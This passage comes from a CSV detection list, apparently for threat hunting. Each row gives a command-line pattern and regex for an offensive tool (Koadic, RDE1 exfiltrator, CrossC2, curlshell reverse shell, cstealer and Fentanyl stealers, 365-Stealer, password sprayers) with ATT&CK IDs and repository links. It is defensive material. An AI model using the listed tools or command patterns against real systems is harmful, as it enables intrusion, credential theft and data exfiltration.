TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* core.stager *",".{0,1000}\score\.stager\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* couchdb-databases.nse*",".{0,1000}\scouchdb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* couchdb-stats.nse*",".{0,1000}\scouchdb\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* crack_list client_wordlists.py*",".{0,1000}\scrack_list\sclient_wordlists\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* crack_list cracklist_api.py*",".{0,1000}\scrack_list\scracklist_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* crack_list dictionary.py*",".{0,1000}\scrack_list\sdictionary\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* crack_list wordlist.py*",".{0,1000}\scrack_list\swordlist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* --crack-status*",".{0,1000}\s\-\-crack\-status.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --crawl=*",".{0,1000}\s\-\-crawl\=.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* crawler.py -u http*",".{0,1000}\scrawler\.py\s\-u\shttp.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "* crde_arm_musl https -*",".{0,1000}\scrde_arm_musl\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_armv7 https -*",".{0,1000}\scrde_armv7\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_debug https -*",".{0,1000}\scrde_debug\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - 
T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_linux https -*",".{0,1000}\scrde_linux\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_linux_aarch64 https -*",".{0,1000}\scrde_linux_aarch64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_linux_x86_64 https -*",".{0,1000}\scrde_linux_x86_64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_macos https -*",".{0,1000}\scrde_macos\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_release https 
-*",".{0,1000}\scrde_release\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_windows https -*",".{0,1000}\scrde_windows\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_windows_x64 https -*",".{0,1000}\scrde_windows_x64\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* crde_windows_x86 https -*",".{0,1000}\scrde_windows_x86\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* Create-HotKeyLNK.ps1*",".{0,1000}\sCreate\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 
- TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* createproxydll.sh*",".{0,1000}\screateproxydll\.sh.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "* --createpub -n 7828374823761928712873129873981723...12837182 -e 65537*",".{0,1000}\s\-\-createpub\s\-n\s7828374823761928712873129873981723\.\.\.12837182\s\-e\s65537.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* Cred_Dump.sh*",".{0,1000}\sCred_Dump\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* credentials /pvk:*",".{0,1000}\scredentials\s\/pvk\:.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* credmaster.py*",".{0,1000}\scredmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - 
uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* credmaster-success.txt*",".{0,1000}\scredmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* credmaster-validusers.txt*",".{0,1000}\scredmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* creds-summary.nse*",".{0,1000}\screds\-summary\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*- Cronos rootkit debugger -*",".{0,1000}\-\sCronos\srootkit\sdebugger\s\-.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "* CrossC2 Listener*",".{0,1000}\sCrossC2\sListener.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "* CrossC2.*",".{0,1000}\sCrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "* CrossC2Kit *",".{0,1000}\sCrossC2Kit\s.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","0","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "* CSExec.py*",".{0,1000}\sCSExec\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* -CShardDLLBytes*",".{0,1000}\s\-CShardDLLBytes.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* cstealer.py*",".{0,1000}\scstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. 
app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","10","8","756","389","2024-04-26T21:18:07Z","2021-08-03T00:52:45Z" "* ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1897","287","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z" "* cups-info.nse*",".{0,1000}\scups\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cups-queue-info.nse*",".{0,1000}\scups\-queue\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* curlshell.py*",".{0,1000}\scurlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","424","69","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z" "* cursorinit.vbs*",".{0,1000}\scursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "* --custom_user_agent*",".{0,1000}\s\-\-custom_user_agent.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --custom-steal",".{0,1000}\s\-\-custom\-steal","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal listusers*",".{0,1000}\s\-\-custom\-steal\slistusers.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal onedrive*",".{0,1000}\s\-\-custom\-steal\sonedrive.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal onenote*",".{0,1000}\s\-\-custom\-steal\sonenote.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --custom-steal outlook*",".{0,1000}\s\-\-custom\-steal\soutlook.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "* --cve=* --command*",".{0,1000}\s\-\-cve\=.{0,1000}\s\-\-command.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "* CVE-2023-38831-RaRCE*",".{0,1000}\sCVE\-2023\-38831\-RaRCE.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "* cvs-brute.nse*",".{0,1000}\scvs\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cvs-brute-repository.nse*",".{0,1000}\scvs\-brute\-repository\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -d * -dc * -nu 'neo4j' -np *",".{0,1000}\s\-d\s.{0,1000}\s\-dc\s.{0,1000}\s\-nu\s\'neo4j\'\s\-np\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -d * -n * -m reverse*=",".{0,1000}\s\-d\s.{0,1000}\s\-n\s.{0,1000}\s\-m\sreverse.{0,1000}\=","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","5","435","157","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "* -d * -n * -m rot13*",".{0,1000}\s\-d\s.{0,1000}\s\-n\s.{0,1000}\s\-m\srot13.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","5","435","157","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" "* -d * -t axfr >*",".{0,1000}\s\-d\s.{0,1000}\s\-t\saxfr\s\>.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
